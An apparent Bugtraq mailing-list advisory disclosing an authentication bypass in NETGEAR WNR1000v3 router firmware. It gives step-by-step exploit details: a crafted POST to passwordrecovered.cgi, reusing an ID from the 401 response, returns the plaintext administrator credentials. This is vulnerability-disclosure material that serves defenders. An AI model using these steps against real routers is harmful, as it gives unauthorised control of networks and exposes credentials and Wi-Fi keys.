[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
NETGEAR WNR1000v3 Password Recovery Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: NETGEAR WNR1000v3 Password Recovery Vulnerability
- From: c1ph04mail@xxxxxxxxx
- Date: Sun, 12 Jan 2014 01:10:47 GMT
Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless
router are affected by a password recovery vulnerability.
Exploiting this vulnerability allows an attacker to recover the router's
(plaintext) Administrator credentials and subsequently gain full access to the
device. This vulnerabilty can be exploited remotely if the remote
administration access feature is enabled (as well as locally via wired or
wireless access).
Tested Device Model: Netgear N150 WNR1000v3
Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and
V1.0.2.62_60.0.87
Potential Impacts: Gaining full control over a wireless router exposes multiple
attack vectors including: DoS, DNS control (many ways this can be leveraged to
exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for
guest and private network) firewall rule and port forwarding manipulation, etc.
Vulnerabilty Status: Vulnerability was privately disclosed to the vendor in
June of 2013, however they have not yet issued a patch.
Other Notes: This vulnerability remains exploitable when the password recovery
feature of the router is disabled.
Overview:
The password recovery mechanism appears to be designed to work as follows:
1.) After failing to login the user will be redirected to a password recovery
page that requests the router serial number
2.) If the user enters the serial number correctly, another page will appear
that requires the user to correctly answer 2 secret questions
3.) If the user answers the secret questions correctly, the router username and
password is displayed
The problem: The implementation of this password recovery method has
issues...lots of issues
Vulnerability and Exploit Details:
1.) Access the router login through a web browser: http://192.168.1.1
2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary
credentials), the router responds with the following (Note the "unauth.cgi?id"
parameter):
--------------------------------------------------
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"
Content-type: text/html
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<title>401 Unauthorized</title></head>
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
<p>Access to this resource is denied, your client has not supplied the correct
authentication.</p><form method="post" action="unauth.cgi?id=78185530"
name="aForm"></form></body>
</html>
--------------------------------------------------
3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post
request:
-------------------------------------------------------------------------------------------------
POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.1.1
Content-Length: 35
Connection: Keep-Alive
Pragma: no-cache
--------------------------------------------------
The username and (plaintext) password are returned in the response (truncated
for brevity):
--------------------------------------------------
..
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">D0n'tGuessMe!</td>
</tr>
..
--------------------------------------------------
Additional details and proof-of-concept exploit can be found here:
http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html